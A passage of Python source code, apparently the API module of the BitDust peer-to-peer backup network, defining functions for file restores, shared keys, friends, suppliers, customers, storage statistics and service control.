shared_access_coordinator\r\n active_share = shared_access_coordinator.get_active_share(key_id)\r\n if not active_share:\r\n active_share = shared_access_coordinator.SharedAccessCoordinator(\r\n key_id, log_events=True, publish_events=True, )\r\n lg.out(4, 'api.download_start opened new share : %s' % active_share.key_id)\r\n else:\r\n lg.out(4, 'api.download_start found existing share : %s' % active_share.key_id)\r\n if active_share.state != 'CONNECTED':\r\n cb_id = 'file_download_start_' + str(time.time())\r\n active_share.addStateChangedCallback(\r\n cb=lambda o, n, e, a: _share_state_changed(cb_id, active_share, o, n, e, a),\r\n callback_id=cb_id,\r\n )\r\n active_share.automat('restart')\r\n lg.out(4, 'api.download_start added callback %s to the active share : %s' % (cb_id, active_share.key_id))\r\n else:\r\n lg.out(4, 'api.download_start existing share %s is currently CONNECTED' % active_share.key_id)\r\n _start_restore()\r\n return True\r\n\r\n if open_share and key_alias != 'master':\r\n _open_share()\r\n else:\r\n if _Debug:\r\n lg.out(_DebugLevel, ' \"open_share\" skipped, starting restore')\r\n _start_restore()\r\n \r\n return ret\r\n\r\n\r\ndef file_download_stop(remote_path):\r\n \"\"\"\r\n Abort currently running restore process.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'restoring of \"alice@p2p-host.com:0/1/2\" aborted'}\r\n \"\"\"\r\n if not driver.is_on('service_restores'):\r\n return ERROR('service_restores() is not started')\r\n if _Debug:\r\n lg.out(_DebugLevel, 'api.file_download_stop remote_path=%s' % remote_path)\r\n from storage import backup_fs\r\n from storage import restore_monitor\r\n from system import bpio\r\n from lib import packetid\r\n from userid import my_id\r\n from userid import global_id\r\n glob_path = global_id.NormalizeGlobalID(global_id.ParseGlobalID(remote_path))\r\n backupIDs = []\r\n if packetid.Valid(glob_path['path']):\r\n customerGlobalID, pathID, version = packetid.SplitBackupID(remote_path)\r\n if not customerGlobalID:\r\n customerGlobalID = global_id.UrlToGlobalID(my_id.getLocalID())\r\n item = backup_fs.GetByID(pathID, iterID=backup_fs.fsID(glob_path['customer']))\r\n if not item:\r\n return ERROR('path \"%s\" is not found in catalog' % remote_path)\r\n versions = []\r\n if version:\r\n versions.append(version)\r\n if not versions:\r\n versions.extend(item.get_versions())\r\n for version in versions:\r\n backupIDs.append(packetid.MakeBackupID(customerGlobalID, pathID, version))\r\n else:\r\n remotePath = bpio.remotePath(glob_path['path'])\r\n knownPathID = backup_fs.ToID(remotePath, iter=backup_fs.fs(glob_path['idurl']))\r\n if not knownPathID:\r\n return ERROR('path \"%s\" was not found in catalog' % remotePath)\r\n item = backup_fs.GetByID(knownPathID, iterID=backup_fs.fsID(glob_path['idurl']))\r\n if not item:\r\n return ERROR('item \"%s\" is not found in catalog' % knownPathID)\r\n versions = []\r\n if glob_path['version']:\r\n versions.append(glob_path['version'])\r\n if not versions:\r\n versions.extend(item.get_versions())\r\n for version in versions:\r\n backupIDs.append(packetid.MakeBackupID(glob_path['customer'], knownPathID, version))\r\n if not backupIDs:\r\n return ERROR('not found any remote versions for \"%s\"' % remote_path)\r\n r = []\r\n for backupID in backupIDs:\r\n r.append({'backup_id': backupID, 'aborted': restore_monitor.Abort(backupID), })\r\n if _Debug:\r\n lg.out(_DebugLevel, ' stopping %s' % r)\r\n return RESULT(r)\r\n\r\n\r\ndef file_explore(local_path):\r\n \"\"\"\r\n \"\"\"\r\n from lib import misc\r\n from system import bpio\r\n locpath = bpio.portablePath(local_path)\r\n if not bpio.pathExist(locpath):\r\n return ERROR('local path not exist')\r\n misc.ExplorePathInOS(locpath)\r\n return OK()\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef share_list(only_active=False, include_mine=True, include_granted=True):\r\n \"\"\"\r\n \"\"\"\r\n if not driver.is_on('service_shared_data'):\r\n return ERROR('service_shared_data() is not started')\r\n from access import shared_access_coordinator\r\n from crypt import my_keys\r\n from userid import global_id\r\n from userid import my_id\r\n results = []\r\n if only_active:\r\n for key_id in shared_access_coordinator.list_active_shares():\r\n _glob_id = global_id.ParseGlobalID(key_id)\r\n to_be_listed = False\r\n if include_mine and _glob_id['idurl'] == my_id.getLocalIDURL():\r\n to_be_listed = True\r\n if include_granted and _glob_id['idurl'] != my_id.getLocalIDURL():\r\n to_be_listed = True\r\n if not to_be_listed:\r\n continue\r\n cur_share = shared_access_coordinator.get_active_share(key_id)\r\n if not cur_share:\r\n lg.warn('share %s not found' % key_id)\r\n continue\r\n results.append(cur_share.to_json())\r\n return RESULT(results)\r\n for key_id in my_keys.known_keys():\r\n if not key_id.startswith('share_'):\r\n continue\r\n _glob_id = global_id.ParseGlobalID(key_id)\r\n to_be_listed = False\r\n if include_mine and _glob_id['idurl'] == my_id.getLocalIDURL():\r\n to_be_listed = True\r\n if include_granted and _glob_id['idurl'] != my_id.getLocalIDURL():\r\n to_be_listed = True\r\n if not to_be_listed:\r\n continue\r\n results.append({\r\n 'key_id': key_id,\r\n 'idurl': _glob_id['idurl'],\r\n 'state': None,\r\n 'suppliers': [],\r\n })\r\n return RESULT(results)\r\n\r\n\r\ndef share_create(owner_id=None, key_size=2048):\r\n \"\"\"\r\n \"\"\"\r\n if not driver.is_on('service_shared_data'):\r\n return ERROR('service_shared_data() is not started')\r\n from crypt import key\r\n from crypt import my_keys\r\n from userid import my_id\r\n if not owner_id:\r\n owner_id = my_id.getGlobalID()\r\n key_id = None\r\n while True:\r\n random_sample = os.urandom(24)\r\n key_alias = 'share_%s' % key.HashMD5(random_sample, hexdigest=True)\r\n key_id = my_keys.make_key_id(alias=key_alias, creator_glob_id=owner_id)\r\n if my_keys.is_key_registered(key_id):\r\n continue\r\n break\r\n key_object = my_keys.generate_key(key_id, key_size=key_size)\r\n if key_object is None:\r\n return ERROR('failed to generate private key \"%s\"' % key_id)\r\n return OK(my_keys.make_key_info(\r\n key_object,\r\n key_id=key_id,\r\n include_private=False,\r\n ), message='new share \"%s\" was generated successfully' % key_id, )\r\n\r\n\r\ndef share_grant(trusted_remote_user, key_id):\r\n \"\"\"\r\n \"\"\"\r\n if not driver.is_on('service_shared_data'):\r\n return ERROR('service_shared_data() is not started')\r\n if not key_id.startswith('share_'):\r\n return ERROR('invlid share name')\r\n from userid import global_id\r\n remote_idurl = trusted_remote_user\r\n if trusted_remote_user.count('@'):\r\n glob_id = global_id.ParseGlobalID(trusted_remote_user)\r\n remote_idurl = glob_id['idurl']\r\n if not remote_idurl:\r\n return ERROR('wrong user id')\r\n from access import shared_access_donor\r\n ret = Deferred()\r\n\r\n def _on_shared_access_donor_success(result):\r\n ret.callback(OK() if result else ERROR('failed'))\r\n return None\r\n\r\n def _on_shared_access_donor_failed(err):\r\n ret.callback(ERROR('failed'))\r\n return None\r\n\r\n d = Deferred()\r\n d.addCallback(_on_shared_access_donor_success)\r\n d.addErrback(_on_shared_access_donor_failed)\r\n shared_access_donor_machine = shared_access_donor.SharedAccessDonor(log_events=True, publish_events=True, )\r\n shared_access_donor_machine.automat('init', (remote_idurl, key_id, d, ))\r\n return ret\r\n\r\n\r\ndef share_open(key_id):\r\n \"\"\"\r\n \"\"\"\r\n if not driver.is_on('service_shared_data'):\r\n return ERROR('service_shared_data() is not started')\r\n if not key_id.startswith('share_'):\r\n return ERROR('invlid share name')\r\n from access import shared_access_coordinator\r\n active_share = shared_access_coordinator.get_active_share(key_id)\r\n new_share = False\r\n if not active_share:\r\n new_share = True\r\n active_share = shared_access_coordinator.SharedAccessCoordinator(key_id, log_events=True, publish_events=True, )\r\n ret = Deferred()\r\n\r\n def _on_shared_access_coordinator_state_changed(oldstate, newstate, event_string, args):\r\n active_share.removeStateChangedCallback(_on_shared_access_coordinator_state_changed)\r\n if newstate == 'CONNECTED':\r\n if new_share:\r\n ret.callback(OK('share \"%s\" opened' % key_id, extra_fields=active_share.to_json()))\r\n else:\r\n ret.callback(OK('share \"%s\" refreshed' % key_id, extra_fields=active_share.to_json()))\r\n else:\r\n ret.callback(ERROR('share \"%s\" was not opened' % key_id, extra_fields=active_share.to_json()))\r\n return None\r\n\r\n active_share.addStateChangedCallback(_on_shared_access_coordinator_state_changed, oldstate=None, newstate='CONNECTED')\r\n active_share.addStateChangedCallback(_on_shared_access_coordinator_state_changed, oldstate=None, newstate='DISCONNECTED')\r\n active_share.automat('restart')\r\n return ret\r\n\r\n\r\ndef share_close(key_id):\r\n \"\"\"\r\n \"\"\"\r\n if not driver.is_on('service_shared_data'):\r\n return ERROR('service_shared_data() is not started')\r\n if not key_id.startswith('share_'):\r\n return ERROR('invlid share name')\r\n from access import shared_access_coordinator\r\n this_share = shared_access_coordinator.get_active_share(key_id)\r\n if not this_share:\r\n return ERROR('this share is not opened')\r\n this_share.automat('shutdown')\r\n return OK('share \"%s\" closed' % key_id, extra_fields=this_share.to_json())\r\n\r\n\r\ndef share_history():\r\n \"\"\"\r\n \"\"\"\r\n if not driver.is_on('service_shared_data'):\r\n return ERROR('service_shared_data() is not started')\r\n return RESULT([],)\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef friend_list():\r\n \"\"\"\r\n Returns list of correspondents ids\r\n \"\"\"\r\n from contacts import contactsdb\r\n from userid import global_id\r\n result = []\r\n for idurl, alias in contactsdb.correspondents():\r\n glob_id = global_id.ParseIDURL(idurl)\r\n contact_status_label = None\r\n contact_state = None\r\n if driver.is_on('service_identity_propagate'):\r\n from p2p import contact_status\r\n state_machine_inst = contact_status.getInstance(idurl)\r\n if state_machine_inst:\r\n contact_status_label = contact_status.stateToLabel(state_machine_inst.state)\r\n contact_state = state_machine_inst.state\r\n result.append({\r\n 'idurl': idurl,\r\n 'global_id': glob_id['customer'],\r\n 'idhost': glob_id['idhost'],\r\n 'username': glob_id['user'],\r\n 'alias': alias,\r\n 'contact_status': contact_status_label,\r\n 'contact_state': contact_state,\r\n })\r\n return RESULT(result)\r\n\r\ndef friend_add(idurl_or_global_id, alias=''):\r\n \"\"\"\r\n Add user to the list of friends\r\n \"\"\"\r\n from contacts import contactsdb\r\n from userid import global_id\r\n idurl = idurl_or_global_id\r\n if global_id.IsValidGlobalUser(idurl_or_global_id):\r\n idurl = global_id.GlobalUserToIDURL(idurl_or_global_id)\r\n if not idurl:\r\n return ERROR('you must specify the global IDURL address where your identity file was last located')\r\n if not contactsdb.is_correspondent(idurl):\r\n contactsdb.add_correspondent(idurl, alias)\r\n contactsdb.save_correspondents()\r\n return OK('new friend has been added')\r\n return OK('this friend has been already added')\r\n\r\ndef friend_remove(idurl_or_global_id):\r\n \"\"\"\r\n Remove user from the list of friends\r\n \"\"\"\r\n from contacts import contactsdb\r\n from userid import global_id\r\n idurl = idurl_or_global_id\r\n if global_id.IsValidGlobalUser(idurl_or_global_id):\r\n idurl = global_id.GlobalUserToIDURL(idurl_or_global_id)\r\n if not idurl:\r\n return ERROR('you must specify the global IDURL address where your identity file was last located')\r\n if contactsdb.is_correspondent(idurl):\r\n contactsdb.remove_correspondent(idurl)\r\n contactsdb.save_correspondents()\r\n return OK('friend has been removed')\r\n return ERROR('friend not found')\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef suppliers_list(customer_idurl_or_global_id=None, verbose=False):\r\n \"\"\"\r\n This method returns a list of suppliers - nodes which stores your encrypted data on own machines.\r\n\r\n Return:\r\n\r\n {'status': 'OK',\r\n 'result':[{\r\n 'connected': '05-06-2016 13:06:05',\r\n 'idurl': 'http://p2p-id.ru/bitdust_j_vps1014.xml',\r\n 'files_count': 14,\r\n 'position': 0,\r\n 'contact_status': 'offline',\r\n 'contact_state': 'OFFLINE'\r\n }, {\r\n 'connected': '05-06-2016 13:04:57',\r\n 'idurl': 'http://veselin-p2p.ru/bitdust_j_vps1001.xml',\r\n 'files_count': 14,\r\n 'position': 1,\r\n 'contact_status': 'online'\r\n 'contact_state': 'CONNECTED'\r\n }]}\r\n \"\"\"\r\n if not driver.is_on('service_customer'):\r\n return ERROR('service_customer() is not started')\r\n from contacts import contactsdb\r\n from customer import supplier_connector\r\n from p2p import contact_status\r\n from lib import misc\r\n from userid import my_id\r\n from userid import global_id\r\n from storage import backup_matrix\r\n customer_idurl = customer_idurl_or_global_id\r\n if not customer_idurl:\r\n customer_idurl = my_id.getLocalID()\r\n else:\r\n if global_id.IsValidGlobalUser(customer_idurl):\r\n customer_idurl = global_id.GlobalUserToIDURL(customer_idurl)\r\n results = []\r\n for (pos, supplier_idurl, ) in enumerate(contactsdb.suppliers(customer_idurl)):\r\n r = {\r\n 'position': pos,\r\n 'idurl': supplier_idurl,\r\n 'global_id': global_id.UrlToGlobalID(supplier_idurl),\r\n 'supplier_state':\r\n None if not supplier_connector.is_supplier(supplier_idurl, customer_idurl)\r\n else supplier_connector.by_idurl(supplier_idurl, customer_idurl).state,\r\n 'connected': misc.readSupplierData(supplier_idurl, 'connected', customer_idurl),\r\n 'contact_status': None,\r\n 'contact_state': None,\r\n }\r\n if contact_status.isKnown(supplier_idurl):\r\n cur_state = contact_status.getInstance(supplier_idurl).state\r\n r['contact_status'] = contact_status.stateToLabel(cur_state)\r\n r['contact_state'] = cur_state\r\n if verbose:\r\n _files, _total, _report = backup_matrix.GetSupplierStats(pos, customer_idurl=customer_idurl)\r\n r['listfiles'] = misc.readSupplierData(supplier_idurl, 'listfiles', customer_idurl)\r\n r['fragments'] = {\r\n 'items': _files,\r\n 'files': _total,\r\n 'details': _report,\r\n }\r\n results.append(r)\r\n return RESULT(results)\r\n\r\n\r\ndef supplier_replace(index_or_idurl_or_global_id):\r\n \"\"\"\r\n Execute a fire/hire process for given supplier, another random node will\r\n replace this supplier. As soon as new supplier is found and connected,\r\n rebuilding of all uploaded data will be started and the new node will start\r\n getting a reconstructed fragments.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'supplier http://p2p-id.ru/alice.xml will be replaced by new peer'}\r\n \"\"\"\r\n if not driver.is_on('service_customer'):\r\n return ERROR('service_customer() is not started')\r\n from contacts import contactsdb\r\n from userid import my_id\r\n from userid import global_id\r\n customer_idurl = my_id.getLocalID()\r\n supplier_idurl = index_or_idurl_or_global_id\r\n if supplier_idurl.isdigit():\r\n supplier_idurl = contactsdb.supplier(int(supplier_idurl), customer_idurl=customer_idurl)\r\n else:\r\n if global_id.IsValidGlobalUser(supplier_idurl):\r\n supplier_idurl = global_id.GlobalUserToIDURL(supplier_idurl)\r\n if supplier_idurl and supplier_idurl and contactsdb.is_supplier(supplier_idurl, customer_idurl=customer_idurl):\r\n from customer import fire_hire\r\n fire_hire.AddSupplierToFire(supplier_idurl)\r\n fire_hire.A('restart')\r\n return OK('supplier \"%s\" will be replaced by new random peer' % supplier_idurl)\r\n return ERROR('supplier not found')\r\n\r\n\r\ndef supplier_change(index_or_idurl_or_global_id, new_supplier_idurl_or_global_id):\r\n \"\"\"\r\n Doing same as supplier_replace() but new node must be provided by you - you can manually assign a supplier.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'supplier http://p2p-id.ru/alice.xml will be replaced by http://p2p-id.ru/bob.xml'}\r\n \"\"\"\r\n if not driver.is_on('service_customer'):\r\n return ERROR('service_customer() is not started')\r\n from contacts import contactsdb\r\n from userid import my_id\r\n from userid import global_id\r\n customer_idurl = my_id.getLocalID()\r\n supplier_idurl = index_or_idurl_or_global_id\r\n if supplier_idurl.isdigit():\r\n supplier_idurl = contactsdb.supplier(int(supplier_idurl), customer_idurl=customer_idurl)\r\n else:\r\n if global_id.IsValidGlobalUser(supplier_idurl):\r\n supplier_idurl = global_id.GlobalUserToIDURL(supplier_idurl)\r\n new_supplier_idurl = new_supplier_idurl_or_global_id\r\n if global_id.IsValidGlobalUser(new_supplier_idurl):\r\n new_supplier_idurl = global_id.GlobalUserToIDURL(new_supplier_idurl)\r\n if not supplier_idurl or not contactsdb.is_supplier(supplier_idurl, customer_idurl=customer_idurl):\r\n return ERROR('supplier not found')\r\n if contactsdb.is_supplier(new_supplier_idurl, customer_idurl=customer_idurl):\r\n return ERROR('peer \"%s\" is your supplier already' % new_supplier_idurl)\r\n from customer import fire_hire\r\n from customer import supplier_finder\r\n supplier_finder.AddSupplierToHire(new_supplier_idurl)\r\n fire_hire.AddSupplierToFire(supplier_idurl)\r\n fire_hire.A('restart')\r\n return OK('supplier \"%s\" will be replaced by \"%s\"' % (supplier_idurl, new_supplier_idurl))\r\n\r\n\r\ndef suppliers_ping():\r\n \"\"\"\r\n Sends short requests to all suppliers to get their current statuses.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'requests to all suppliers was sent'}\r\n \"\"\"\r\n if not driver.is_on('service_customer'):\r\n return ERROR('service_customer() is not started')\r\n from p2p import propagate\r\n propagate.SlowSendSuppliers(0.1)\r\n return OK('requests to all suppliers was sent')\r\n\r\n\r\ndef suppliers_dht_lookup(customer_idurl_or_global_id):\r\n \"\"\"\r\n Scans DHT network for key-value pairs related to given customer and\r\n returns a list of his \"possible\" suppliers.\r\n \"\"\"\r\n if not driver.is_on('service_supplier_relations'):\r\n return ERROR('service_supplier_relations() is not started')\r\n from dht import dht_relations\r\n from userid import my_id\r\n from userid import global_id\r\n customer_idurl = customer_idurl_or_global_id\r\n if not customer_idurl:\r\n customer_idurl = my_id.getLocalID()\r\n else:\r\n if global_id.IsValidGlobalUser(customer_idurl):\r\n customer_idurl = global_id.GlobalUserToIDURL(customer_idurl)\r\n ret = Deferred()\r\n d = dht_relations.scan_customer_supplier_relations(customer_idurl)\r\n d.addCallback(lambda result_list: ret.callback(RESULT(result_list)))\r\n d.addErrback(lambda err: ret.callback(ERROR([err, ])))\r\n return ret\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n\r\ndef customers_list(verbose=False):\r\n \"\"\"\r\n List of customers - nodes who stores own data on your machine.\r\n\r\n Return:\r\n\r\n {'status': 'OK',\r\n 'result': [ { 'idurl': 'http://p2p-id.ru/bob.xml',\r\n 'position': 0,\r\n 'status': 'offline'\r\n }]}\r\n \"\"\"\r\n if not driver.is_on('service_supplier'):\r\n return ERROR('service_supplier() is not started')\r\n from contacts import contactsdb\r\n from p2p import contact_status\r\n from userid import global_id\r\n results = []\r\n for pos, customer_idurl in enumerate(contactsdb.customers()):\r\n r = {\r\n 'position': pos,\r\n 'global_id': global_id.UrlToGlobalID(customer_idurl),\r\n 'idurl': customer_idurl,\r\n 'contact_status': None,\r\n 'contact_state': None,\r\n }\r\n if contact_status.isKnown(customer_idurl):\r\n cur_state = contact_status.getInstance(customer_idurl).state\r\n r['contact_status'] = contact_status.stateToLabel(cur_state)\r\n r['contact_state'] = cur_state\r\n results.append(r)\r\n return RESULT(results)\r\n\r\ndef customer_reject(idurl_or_global_id):\r\n \"\"\"\r\n Stop supporting given customer, remove all his files from local disc, close\r\n connections with that node.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'customer http://p2p-id.ru/bob.xml rejected, 536870912 bytes were freed'}\r\n \"\"\"\r\n if not driver.is_on('service_supplier'):\r\n return ERROR('service_supplier() is not started')\r\n from contacts import contactsdb\r\n from storage import accounting\r\n from main import settings\r\n from main import events\r\n from supplier import local_tester\r\n from p2p import p2p_service\r\n from lib import packetid\r\n from userid import global_id\r\n customer_idurl = idurl_or_global_id\r\n if global_id.IsValidGlobalUser(customer_idurl):\r\n customer_idurl = global_id.GlobalUserToIDURL(customer_idurl)\r\n if not contactsdb.is_customer(customer_idurl):\r\n return ERROR('customer not found')\r\n # send packet to notify about service from us was rejected\r\n # TODO - this is not yet handled on other side\r\n p2p_service.SendFailNoRequest(customer_idurl, packetid.UniqueID(), 'service rejected')\r\n # remove from customers list\r\n current_customers = contactsdb.customers()\r\n current_customers.remove(customer_idurl)\r\n contactsdb.update_customers(current_customers)\r\n contactsdb.remove_customer_meta_info(customer_idurl)\r\n contactsdb.save_customers()\r\n # remove records for this customers from quotas info\r\n space_dict = accounting.read_customers_quotas()\r\n consumed_by_cutomer = space_dict.pop(customer_idurl, None)\r\n consumed_space = accounting.count_consumed_space(space_dict)\r\n space_dict['free'] = settings.getDonatedBytes() - int(consumed_space)\r\n accounting.write_customers_quotas(space_dict)\r\n events.send('existing-customer-terminated', dict(idurl=customer_idurl))\r\n # restart local tester\r\n local_tester.TestUpdateCustomers()\r\n return OK('customer \"%s\" rejected, \"%s\" bytes were freed' % (customer_idurl, consumed_by_cutomer))\r\n\r\n\r\ndef customers_ping():\r\n \"\"\"\r\n Sends Identity packet to all customers to check their current statuses.\r\n Every node will reply with Ack packet on any valid incoming Identiy packet.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'requests to all customers was sent'}\r\n \"\"\"\r\n if not driver.is_on('service_supplier'):\r\n return ERROR('service_supplier() is not started')\r\n from p2p import propagate\r\n propagate.SlowSendCustomers(0.1)\r\n return OK('requests to all customers was sent')\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n\r\ndef space_donated():\r\n \"\"\"\r\n Returns detailed statistics about your donated space usage.\r\n\r\n Return:\r\n\r\n {'status': 'OK',\r\n 'result': [{\r\n 'consumed': 0,\r\n 'consumed_percent': '0%',\r\n 'consumed_str': '0 bytes',\r\n 'customers': [],\r\n 'customers_num': 0,\r\n 'donated': 1073741824,\r\n 'donated_str': '1024 MB',\r\n 'free': 1073741824,\r\n 'old_customers': [],\r\n 'real': 0,\r\n 'used': 0,\r\n 'used_percent': '0%',\r\n 'used_str': '0 bytes'\r\n }]}\r\n \"\"\"\r\n from storage import accounting\r\n result = accounting.report_donated_storage()\r\n lg.out(4, 'api.space_donated finished with %d customers and %d errors' % (\r\n len(result['customers']), len(result['errors']),))\r\n for err in result['errors']:\r\n lg.out(4, ' %s' % err)\r\n errors = result.pop('errors', [])\r\n return RESULT([result, ], errors=errors,)\r\n\r\n\r\ndef space_consumed():\r\n \"\"\"\r\n Returns some info about your current usage of BitDust resources.\r\n\r\n Return:\r\n\r\n {'status': 'OK',\r\n 'result': [{\r\n 'available': 907163720,\r\n 'available_per_supplier': 907163720,\r\n 'available_per_supplier_str': '865.14 MB',\r\n 'available_str': '865.14 MB',\r\n 'needed': 1073741824,\r\n 'needed_per_supplier': 1073741824,\r\n 'needed_per_supplier_str': '1024 MB',\r\n 'needed_str': '1024 MB',\r\n 'suppliers_num': 2,\r\n 'used': 166578104,\r\n 'used_per_supplier': 166578104,\r\n 'used_per_supplier_str': '158.86 MB',\r\n 'used_percent': '0.155%',\r\n 'used_str': '158.86 MB'\r\n }]}\r\n \"\"\"\r\n from storage import accounting\r\n result = accounting.report_consumed_storage()\r\n lg.out(4, 'api.space_consumed finished')\r\n return RESULT([result, ])\r\n\r\n\r\ndef space_local():\r\n \"\"\"\r\n Returns detailed statistics about current usage of your local disk.\r\n\r\n Return:\r\n\r\n {'status': 'OK',\r\n 'result': [{\r\n 'backups': 0,\r\n 'backups_str': '0 bytes',\r\n 'customers': 0,\r\n 'customers_str': '0 bytes',\r\n 'diskfree': 103865696256,\r\n 'diskfree_percent': '0.00162%',\r\n 'diskfree_str': '96.73 GB',\r\n 'disktotal': 63943473102848,\r\n 'disktotal_str': '59552 GB',\r\n 'temp': 48981,\r\n 'temp_str': '47.83 KB',\r\n 'total': 45238743,\r\n 'total_percent': '0%',\r\n 'total_str': '43.14 MB'\r\n }]}\r\n \"\"\"\r\n from storage import accounting\r\n result = accounting.report_local_storage()\r\n lg.out(4, 'api.space_local finished')\r\n return RESULT([result, ],)\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef automats_list():\r\n \"\"\"\r\n Returns a list of all currently running state machines.\r\n\r\n Return:\r\n\r\n {'status': 'OK',\r\n 'result': [{\r\n 'index': 1,\r\n 'name': 'initializer',\r\n 'state': 'READY',\r\n 'timers': ''\r\n }, {\r\n 'index': 2,\r\n 'name': 'shutdowner',\r\n 'state': 'READY',\r\n 'timers': ''\r\n }]}\r\n \"\"\"\r\n from automats import automat\r\n result = [{\r\n 'index': a.index,\r\n 'name': a.name,\r\n 'state': a.state,\r\n 'timers': (','.join(a.getTimers().keys())),\r\n } for a in automat.objects().values()]\r\n lg.out(4, 'api.automats_list responded with %d items' % len(result))\r\n return RESULT(result)\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n\r\ndef services_list():\r\n \"\"\"\r\n Returns detailed info about all currently running network services.\r\n\r\n Return:\r\n\r\n {'status': 'OK',\r\n 'result': [{\r\n 'config_path': 'services/backup-db/enabled',\r\n 'depends': ['service_list_files', 'service_data_motion'],\r\n 'enabled': True,\r\n 'index': 3,\r\n 'installed': True,\r\n 'name': 'service_backup_db',\r\n 'state': 'ON'\r\n }, {\r\n 'config_path': 'services/backups/enabled',\r\n 'depends': ['service_list_files', 'service_employer', 'service_rebuilding'],\r\n 'enabled': True,\r\n 'index': 4,\r\n 'installed': True,\r\n 'name': 'service_backups',\r\n 'state': 'ON'\r\n }]}\r\n \"\"\"\r\n result = [{\r\n 'index': svc.index,\r\n 'name': name,\r\n 'state': svc.state,\r\n 'enabled': svc.enabled(),\r\n 'installed': svc.installed(),\r\n 'config_path': svc.config_path,\r\n 'depends': svc.dependent_on()\r\n } for name, svc in sorted(driver.services().items(), key=lambda i: i[0])]\r\n lg.out(4, 'api.services_list responded with %d items' % len(result))\r\n return RESULT(result)\r\n\r\n\r\ndef service_info(service_name):\r\n \"\"\"\r\n Returns detailed info for single service.\r\n\r\n Return:\r\n\r\n {'status': 'OK',\r\n 'result': [{\r\n 'config_path': 'services/tcp-connections/enabled',\r\n 'depends': ['service_network'],\r\n 'enabled': True,\r\n 'index': 24,\r\n 'installed': True,\r\n 'name': 'service_tcp_connections',\r\n 'state': 'ON'\r\n }]}\r\n \"\"\"\r\n svc = driver.services().get(service_name, None)\r\n if svc is None:\r\n service_name = 'service_' + service_name.replace('-', '_')\r\n svc = driver.services().get(service_name, None)\r\n if svc is None:\r\n return ERROR('service \"%s\" not found' % service_name)\r\n return RESULT([{\r\n 'index': svc.index,\r\n 'name': svc.service_name,\r\n 'state': svc.state,\r\n 'enabled': svc.enabled(),\r\n 'installed': svc.installed(),\r\n 'config_path': svc.config_path,\r\n 'depends': svc.dependent_on()\r\n }])\r\n\r\n\r\ndef service_start(service_name):\r\n \"\"\"\r\n Start given service immediately. This method also set `True` for\r\n correspondent option in the program settings:\r\n\r\n .bitdust/config/services/[service name]/enabled\r\n\r\n If some other services, which is dependent on that service,\r\n were already enabled, they will be started also.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'service_tcp_connections was switched on'}\r\n \"\"\"\r\n from main import config\r\n svc = driver.services().get(service_name, None)\r\n if svc is None:\r\n service_name = 'service_' + service_name.replace('-', '_')\r\n svc = driver.services().get(service_name, None)\r\n if svc is None:\r\n lg.out(4, 'api.service_start %s not found' % service_name)\r\n return ERROR('service \"%s\" was not found' % service_name)\r\n if svc.state == 'ON':\r\n lg.out(4, 'api.service_start %s already started' % service_name)\r\n return ERROR('service \"%s\" already started' % service_name)\r\n current_config = config.conf().getBool(svc.config_path)\r\n if current_config:\r\n lg.out(4, 'api.service_start %s already enabled' % service_name)\r\n return ERROR('service \"%s\" already enabled' % service_name)\r\n config.conf().setBool(svc.config_path, True)\r\n return OK('\"%s\" was switched on' % service_name)\r\n\r\n\r\ndef service_stop(service_name):\r\n \"\"\"\r\n Stop given service immediately. It will also set `False` for correspondent\r\n option in the settings.\r\n\r\n .bitdust/config/services/[service name]/enabled\r\n\r\n Dependent services will be stopped as well.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'service_tcp_connections was switched off'}\r\n \"\"\"\r\n from main import config\r\n svc = driver.services().get(service_name, None)\r\n if svc is None:\r\n service_name = 'service_' + service_name.replace('-', '_')\r\n svc = driver.services().get(service_name, None)\r\n if svc is None:\r\n lg.out(4, 'api.service_stop %s not found' % service_name)\r\n return ERROR('service \"%s\" not found' % service_name)\r\n current_config = config.conf().getBool(svc.config_path)\r\n if current_config is None:\r\n lg.out(4, 'api.service_stop config item %s was not found' % svc.config_path)\r\n return ERROR('config item \"%s\" was not found' % svc.config_path)\r\n if current_config is False:\r\n lg.out(4, 'api.service_stop %s already disabled' % service_name)\r\n return ERROR('service \"%s\" already disabled' % service_name)\r\n config.conf().setBool(svc.config_path, False)\r\n return OK('\"%s\" was switched off' % service_name)\r\n\r\n\r\ndef service_restart(service_name, wait_timeout=10):\r\n \"\"\"\r\n Stop given service and start it again, but only if it is already enabled.\r\n Do not change corresponding `.bitdust/config/services/[service name]/enabled` option.\r\n Dependent services will be \"restarted\" as well.\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'service_tcp_connections was restarted'}\r\n \"\"\"\r\n svc = driver.services().get(service_name, None)\r\n if svc is None:\r\n service_name = 'service_' + service_name.replace('-', '_')\r\n svc = driver.services().get(service_name, None)\r\n if svc is None:\r\n lg.out(4, 'api.service_restart %s not found' % service_name)\r\n return ERROR('service \"%s\" not found' % service_name)\r\n ret = Deferred()\r\n d = driver.restart(service_name, wait_timeout=wait_timeout)\r\n d.addCallback(\r\n lambda resp: ret.callback(\r\n OK(resp)))\r\n d.addErrback(\r\n lambda err: ret.callback(\r\n ERROR(err.getErrorMessage())))\r\n return ret\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n\r\ndef packets_stats():\r\n \"\"\"\r\n Returns detailed info about current network usage.\r\n\r\n Return:\r\n\r\n {'status': 'OK',\r\n 'result': [{\r\n 'in': {\r\n 'failed_packets': 0,\r\n 'total_bytes': 0,\r\n 'total_packets': 0,\r\n 'unknown_bytes': 0,\r\n 'unknown_packets': 0\r\n },\r\n 'out': {\r\n 'http://p2p-id.ru/bitdust_j_vps1014.xml': 0,\r\n 'http://veselin-p2p.ru/bitdust_j_vps1001.xml': 0,\r\n 'failed_packets': 8,\r\n 'total_bytes': 0,\r\n 'total_packets': 0,\r\n 'unknown_bytes': 0,\r\n 'unknown_packets': 0\r\n }}]}\r\n \"\"\"\r\n if not 